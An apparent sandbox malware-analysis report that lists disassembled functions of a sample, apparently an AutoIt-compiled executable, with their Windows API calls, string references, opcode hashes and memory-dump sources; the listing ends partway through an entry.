Opcode ID: 734b383ad7d7dab20506a125d6c9f4be273cebcd9f43e783a7dcc2abac1e87cd
Instruction ID: 97bc6d92407ff2a56ed0708dd5f2f97723bbd857ecc88d3c7e314c3683c8788e
Opcode Fuzzy Hash: 734b383ad7d7dab20506a125d6c9f4be273cebcd9f43e783a7dcc2abac1e87cd
Instruction Fuzzy Hash: 4E21E472635614CFC729CF29D841B52B3E1EBA4321B289E6DD0F5CB2D0CA34B945DB94

Function 00EE41FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00EE4218

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: fa8d6dea60c33dbede4449766e45a20c689f2851844633a8fee59051f570c311
Instruction ID: 444afd6b7b122cc6707724f159413acdd514ac82b50304e12d24871aa77944b6
Opcode Fuzzy Hash: fa8d6dea60c33dbede4449766e45a20c689f2851844633a8fee59051f570c311
Instruction Fuzzy Hash: 2DE04FB12402189FC710EF5AD844A9AF7E8AF98760F01D026FD49E7362DA70E841CBA0

Function 00ED4EF5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00ED4F18

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 1a5f2d0e1fe863591ba48da53189093789085f8c1229fa1c0dc071204283737f
Instruction ID: 6911663978468385fb8ac7df73d0ffe2ee4c1afca8cd9d81a0fb8cef29ced08d
Opcode Fuzzy Hash: 1a5f2d0e1fe863591ba48da53189093789085f8c1229fa1c0dc071204283737f
Instruction Fuzzy Hash: FAD05EF03642053FFC284B20AC0FFB60208E3A0785F84798B7201B96E1A8F16C02E035

Function 00EC8C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00EC88D1), ref: 00EC8CB3

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: cb7c75202da57eb49d2b1ba1b5b3abefb729d515240fb66c60f67b179cf06eaa
Instruction ID: 6a6306f716ffbc54628e2d296d6a4cb36a7b222ab39ffd0a6fa98da841a7433d
Opcode Fuzzy Hash: cb7c75202da57eb49d2b1ba1b5b3abefb729d515240fb66c60f67b179cf06eaa
Instruction Fuzzy Hash: ABD05E3226050EAFEF018EA4DC01EBE3B69EB04B01F408111FE15D50A1C775D835EB60

Function 00EB2230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00EB2242

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 1c461672cfc400a9934ee4e39a23955952f0f3670763bd1937c68470dac843d8
Instruction ID: bef88859a715bdbd02b822b5612ab5575e4f15a98092b5b8965cdf3cb3ed9353
Opcode Fuzzy Hash: 1c461672cfc400a9934ee4e39a23955952f0f3670763bd1937c68470dac843d8
Instruction Fuzzy Hash: E6C002B1810109DBDB05DB90D998DEA77BCAB04314F504095A101B2100DA749B448A61

Function 00E9A364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00E9A36A

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 41b2f2f19c0d3802d0cd7f3b6cd2abe2bdbdbd7ffb1f17cfaf0d6c4c8a32b92d
Instruction ID: aa7aabf9fa592efd86b9ab76201eb1045df34d03a1a7d742b7b0972e56258830
Opcode Fuzzy Hash: 41b2f2f19c0d3802d0cd7f3b6cd2abe2bdbdbd7ffb1f17cfaf0d6c4c8a32b92d
Instruction Fuzzy Hash: 47A0113000020CAB8A002B82EC088A8BFAEEB802A0B008020F80C80022AB32A8208A80

Function 00E88A0E Relevance: .6, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 124fb7860383ab9eec92f87f9f6703f2ab43a9454e3fcb34ad8898827005389c
Instruction ID: 1f9c3f10f852df1f88d0ed1adfc12f82930bdeefd2846c1a424a7026e4cd9cfc
Opcode Fuzzy Hash: 124fb7860383ab9eec92f87f9f6703f2ab43a9454e3fcb34ad8898827005389c
Instruction Fuzzy Hash: 5B224B31501615CBCF38AB14C684BBDB7A1EB41308FA8646EDC4EBB195DB35ADC2CB61

Function 00E92405 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: cdf395f0c1bb5cc714151f374cff440326fa30ad45b97363a6244af8b6158689
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 45C1C5322051930ADF2D8639D43407EFBE15EA27B531A279EE4B3EB5C5EF20D524E620

Function 00E9283A Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: c2d1b590c332fab5f15ebc501592d3e6ae7e0c71fc16d94daca16b6f8737eba6
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: F4C182332051930ADF6D463AD43413EBBE15FA27B531A27ADE4B2EB5D4EF20D524E620

Function 00E91BB8 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 5a759a86e6c4a3628fca9058091bb28e7fdeac0a9a4de2790891e426344af8ca
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 3FC1833630919309DF2D463A943407EFAE15EA27B531A27EDE4B3EB5D4EF20D524D610

Function 017136B0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1658953841.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1710000_7F7R8soxHM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: ee13be8ebfbad49a70fec399e5d1d604a263793dc8bcaf37c84a5e726a1a6c49
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 5141C471D1051CDBCF48CFADC991AAEFBF1AF88201F548299D516AB345D730AB41DB40

Function 01713540 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1658953841.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1710000_7F7R8soxHM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: bca014c41c14f7d17392e8fb09402dc1d232a8cc7ddf922e9bfef63849fcc122
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: A4019278A01109EFCB48DFA9C5909AEF7B5FB48720F208599D909A7305D730AE41DB80

Function 017135A0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1658953841.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1710000_7F7R8soxHM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: acc0558d949c7729ad96f025fb3b56cdb27bd6592564f2cd376e59c9a4facafc
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: BC01A478A14109EFCB44DFA8C5909AEFBF5FF48320F208699D819A7305D730AE41DB90

Function 01711ED0 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1658953841.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1710000_7F7R8soxHM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 00EF37F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00EFF910), ref: 00EF38AF
IsWindowVisible.USER32(?), ref: 00EF38D3

Strings

GETLINECOUNT, xrefs: 00EF3B4E
HIDEDROPDOWN, xrefs: 00EF3988
TABLEFT, xrefs: 00EF390F
GETSELECTED, xrefs: 00EF3B2B
ADDSTRING, xrefs: 00EF399E
ISENABLED, xrefs: 00EF38F3
GETCURRENTSELECTION, xrefs: 00EF3A6B
SENDCOMMANDID, xrefs: 00EF3C62
CURRENTTAB, xrefs: 00EF3945
SELECTSTRING, xrefs: 00EF3A8E
TABRIGHT, xrefs: 00EF3925
FINDSTRING, xrefs: 00EF39FE
ISVISIBLE, xrefs: 00EF38BF
DELSTRING, xrefs: 00EF39D1
GETCURRENTLINE, xrefs: 00EF3B75
EDITPASTE, xrefs: 00EF3BE7
GETCURRENTCOL, xrefs: 00EF3BB0
UNCHECK, xrefs: 00EF3B0B
GETLINE, xrefs: 00EF3C23
SHOWDROPDOWN, xrefs: 00EF3968
CHECK, xrefs: 00EF3AF5
SETCURRENTSELECTION, xrefs: 00EF3A3E
ISCHECKED, xrefs: 00EF3AC1

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: c36958b4434fcaa09ec3676a92ce867188b62a5dba3277185b5af4da570698f6
Instruction ID: 638ca269279c19235862ab94c55b953870d75bffe19faef8f61d628f382ef0c0
Opcode Fuzzy Hash: c36958b4434fcaa09ec3676a92ce867188b62a5dba3277185b5af4da570698f6
Instruction Fuzzy Hash: B9D17F302043099FCB14EF24C551ABAB7E1AF94354F11A45CB9867B3A3CB31EE4ACB91

Function 00EFA849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00EFA89F
GetSysColorBrush.USER32(0000000F), ref: 00EFA8D0
GetSysColor.USER32(0000000F), ref: 00EFA8DC
SetBkColor.GDI32(?,000000FF), ref: 00EFA8F6
SelectObject.GDI32(?,?), ref: 00EFA905
InflateRect.USER32(?,000000FF,000000FF), ref: 00EFA930
GetSysColor.USER32(00000010), ref: 00EFA938
CreateSolidBrush.GDI32(00000000), ref: 00EFA93F
FrameRect.USER32(?,?,00000000), ref: 00EFA94E
DeleteObject.GDI32(00000000), ref: 00EFA955
InflateRect.USER32(?,000000FE,000000FE), ref: 00EFA9A0
FillRect.USER32(?,?,?), ref: 00EFA9D2
GetWindowLongW.USER32(?,000000F0), ref: 00EFA9FD

Part of subcall function 00EFAB60: GetSysColor.USER32(00000012), ref: 00EFAB99
Part of subcall function 00EFAB60: SetTextColor.GDI32(?,?), ref: 00EFAB9D
Part of subcall function 00EFAB60: GetSysColorBrush.USER32(0000000F), ref: 00EFABB3
Part of subcall function 00EFAB60: GetSysColor.USER32(0000000F), ref: 00EFABBE
Part of subcall function 00EFAB60: GetSysColor.USER32(00000011), ref: 00EFABDB
Part of subcall function 00EFAB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00EFABE9
Part of subcall function 00EFAB60: SelectObject.GDI32(?,00000000), ref: 00EFABFA
Part of subcall function 00EFAB60: SetBkColor.GDI32(?,00000000), ref: 00EFAC03
Part of subcall function 00EFAB60: SelectObject.GDI32(?,?), ref: 00EFAC10
Part of subcall function 00EFAB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00EFAC2F
Part of subcall function 00EFAB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00EFAC46
Part of subcall function 00EFAB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00EFAC5B

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 5c4bb1336ddb50bd15326e5595bffc80670097deb71d671cf20fac3259db0d34
Instruction ID: 3a1106b629c837409487dfb53a1e7c769e8206ff4a5500ac41f83faf99fd8574
Opcode Fuzzy Hash: 5c4bb1336ddb50bd15326e5595bffc80670097deb71d671cf20fac3259db0d34
Instruction Fuzzy Hash: 1FA1B1B1008305BFD7109F65DC08E7B7BA9FF88321F145A39FA66AA1A1C771D948CB52

Function 00E72C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00E72CA2
DeleteObject.GDI32(00000000), ref: 00E72CE8
DeleteObject.GDI32(00000000), ref: 00E72CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00E72CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00E72D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 00EAC68B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00EAC6C4
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00EACAED

Part of subcall function 00E71B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E72036,?,00000000,?,?,?,?,00E716CB,00000000,?), ref: 00E71B9A

SendMessageW.USER32(?,00001053), ref: 00EACB2A
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00EACB41
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00EACB57
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00EACB62

Strings

0, xrefs: 00EAC981

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 13ebec404dec64f8754eec1ad3f49acc34face23d2721d20b6f9e6edbc771cc5
Instruction ID: 620ec5bb11378ba942a3253c1e57b55f6bd382280c1a5c4df46c9b7f9cf57b0e
Opcode Fuzzy Hash: 13ebec404dec64f8754eec1ad3f49acc34face23d2721d20b6f9e6edbc771cc5
Instruction Fuzzy Hash: 58128E30604201AFDB15CF24C884BA9B7E5BF5A304F64A569F599EF262CB31FC45CB91

Function 00EE77BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00EE77F1
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00EE78B0
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00EE78EE
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00EE7900
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00EE7946
GetClientRect.USER32(00000000,?), ref: 00EE7952
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00EE7996
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00EE79A5
GetStockObject.GDI32(00000011), ref: 00EE79B5
SelectObject.GDI32(00000000,00000000), ref: 00EE79B9
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00EE79C9
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EE79D2
DeleteDC.GDI32(00000000), ref: 00EE79DB
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00EE7A07
SendMessageW.USER32(00000030,00000000,00000001), ref: 00EE7A1E
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00EE7A59
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00EE7A6D
SendMessageW.USER32(00000404,00000001,00000000), ref: 00EE7A7E
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00EE7AAE
GetStockObject.GDI32(00000011), ref: 00EE7AB9
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00EE7AC4
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00EE7ACE

Strings

DISPLAY, xrefs: 00EE799B
AutoIt v3, xrefs: 00EE793E
msctls_progress32, xrefs: 00EE7A4F
static, xrefs: 00EE7990, 00EE7AA8

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: c8c225c74f6de7e9d673556e62a53c50ff7d1a0d3abf94e709a99ebcde22e81b
Instruction ID: 11188ea79987b3c9c9a048a3d9f32d6325611d48c9dcde3c899a4c7671fd876c
Opcode Fuzzy Hash: c8c225c74f6de7e9d673556e62a53c50ff7d1a0d3abf94e709a99ebcde22e81b
Instruction Fuzzy Hash: DEA15E71A40219BFEB149BA5DC4AFABBBA9EF44714F018114FA15F72E1CB70AD00CB64

Function 00EDAF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00EDAF89
GetDriveTypeW.KERNEL32(?,00EFFAC0,?,\\.\,00EFF910), ref: 00EDB066
SetErrorMode.KERNEL32(00000000,00EFFAC0,?,\\.\,00EFF910), ref: 00EDB1C4

Strings

iSCSI, xrefs: 00EDB169
Fibre, xrefs: 00EDB154
\\.\, xrefs: 00EDAFDB
SSD, xrefs: 00EDB0F1
FileBackedVirtual, xrefs: 00EDB193
Unknown, xrefs: 00EDB086, 00EDB12A
SATA, xrefs: 00EDB177
1394, xrefs: 00EDB146
SSA, xrefs: 00EDB14D
Virtual, xrefs: 00EDB18C
RAMDisk, xrefs: 00EDB090
PhysicalDrive, xrefs: 00EDB012
ATA, xrefs: 00EDB13F
CDROM, xrefs: 00EDB09A
Removable, xrefs: 00EDB0B8
ATAPI, xrefs: 00EDB138
SCSI, xrefs: 00EDB131
Fixed, xrefs: 00EDB0AE
MMC, xrefs: 00EDB185
SAS, xrefs: 00EDB170
Network, xrefs: 00EDB0A4
RAID, xrefs: 00EDB162
USB, xrefs: 00EDB15B

Memory Dump Source

